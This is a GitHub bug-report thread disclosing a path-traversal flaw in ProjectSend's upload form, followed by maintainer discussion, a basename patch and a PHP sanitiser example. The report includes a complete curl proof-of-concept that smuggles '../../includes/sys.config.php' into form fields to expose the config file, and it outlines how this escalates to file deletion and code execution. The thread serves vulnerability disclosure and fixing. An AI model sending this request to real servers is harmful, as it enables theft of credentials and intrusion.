Security Flaw - read and delete arbitrary files (accessible by www-data) and run arbitrary code #700
Comments
Thanks for the report. Will look into a way to fix this issue
Thanks for the quick response - very cool product, by the way, thank you for working on it! There are a few other things you guys should also look into improving:
@ignacionelson here's a quick patch for this:
This should clean up any traversal directory information from the user provided file names, by extracting the basename of the file.
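As an added illustration of the basename approach described in the comment above (this is not the patch that was submitted or merged, and not ProjectSend code), a PHP sanitiser for user-supplied file names together with a containment check; the function names and the $uploadDir parameter are assumptions:

```php
<?php
declare(strict_types=1);

// Added example, not ProjectSend's own patch: reduce a user-supplied file
// name to its basename as the comment proposes, then confirm the final
// path still resolves inside the upload directory.
// $uploadDir is an assumed parameter standing in for the configured
// upload location.

/** Strip every directory component; null when nothing usable remains. */
function sanitizeUploadName(string $userName): ?string
{
    // Normalise backslashes so a Windows-style "..\..\" is also stripped,
    // then keep only the last path component (drops "../" and "/").
    $name = basename(str_replace('\\', '/', $userName));
    if ($name === '' || $name === '.' || $name === '..') {
        return null;
    }
    return $name;
}

/**
 * Join the sanitised name onto $uploadDir and verify, via realpath(),
 * that the result (symlinks resolved) is still under $uploadDir.
 * Returns the absolute path, or null if the check fails.
 */
function resolveUploadPath(string $uploadDir, string $userName): ?string
{
    $name = sanitizeUploadName($userName);
    $base = realpath($uploadDir);
    if ($name === null || $base === false) {
        return null;
    }
    $candidate = $base . DIRECTORY_SEPARATOR . $name;
    // For an existing file resolve symlinks; a not-yet-created upload
    // has no realpath, so the joined path itself is checked.
    $resolved = realpath($candidate) ?: $candidate;
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($resolved, $prefix, strlen($prefix)) === 0 ? $resolved : null;
}

// Constructed inputs: the traversal shape from this report and a normal name.
foreach (['../../includes/sys.config.php', 'report.pdf'] as $input) {
    printf("%-32s => %s\n", $input, sanitizeUploadName($input) ?? 'rejected');
}
```

The second function is defence in depth: even when only the basename survives, the realpath() prefix check guards against a stored name that is a symlink out of the upload directory.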
@ignacionelson any news?
Will get a patched version before the end of the week, thank you for providing the code also!
A patched version would be very welcome. We have read multiple posts on security issues, and we're unsure just how safe ProjectSend is in its current version.
Patched on the latest version, r1070 which is now out. Thank you!!
Great, thanks!
Hi @ignacionelson, could you point out which was the fixing commit?
Type
This is a:
[X] Bug report
Description of the problem
It is possible for users to read arbitrary files and (potentially) access the supporting database, delete arbitrary files, access user passwords, run arbitrary code.
Watch video for detailed information:
https://youtu.be/yca1BIDVH-c
List the steps to reproduce the issue
curl 'http://192.168.200.183/upload-process-form.php' -H 'Connection: keep-alive' -H 'Cache-Control: max-age=0' -H 'Origin: http://192.168.200.183' -H 'Upgrade-Insecure-Requests: 1' -H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3' -H 'Referer: http://192.168.200.183/upload-process-form.php' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-US,en;q=0.9,pt;q=0.8,ru;q=0.7,es;q=0.6,pl;q=0.5' -H 'Cookie: PHPSESSID=45h0ndm0sbak7ggcj26e2f0od0' --data 'finished_files%5B%5D=../../includes/sys.config.php&file%5B1%5D%5Boriginal%5D=../../includes/sys.config.php&file%5B1%5D%5Bfile%5D=hacked.txt&file%5B1%5D%5Bname%5D=own3d&file%5B1%5D%5Bdescription%5D=&upload_failed=&submit=' --compressed
This will create a file called "own3d" that will point to includes/sys.config.php, meaning the user can now download that file (and delete it if the file is writable by www-data).
Then, IF the user has access to the MySQL server hosting ProjectSend, the user can:
-- allow upload of arbitrary file extensions (e.g. php)
-- change the client options, allowing clients to delete files
This will allow users to later delete arbitrary files (that www-data has write access to) and run arbitrary php code.
Environment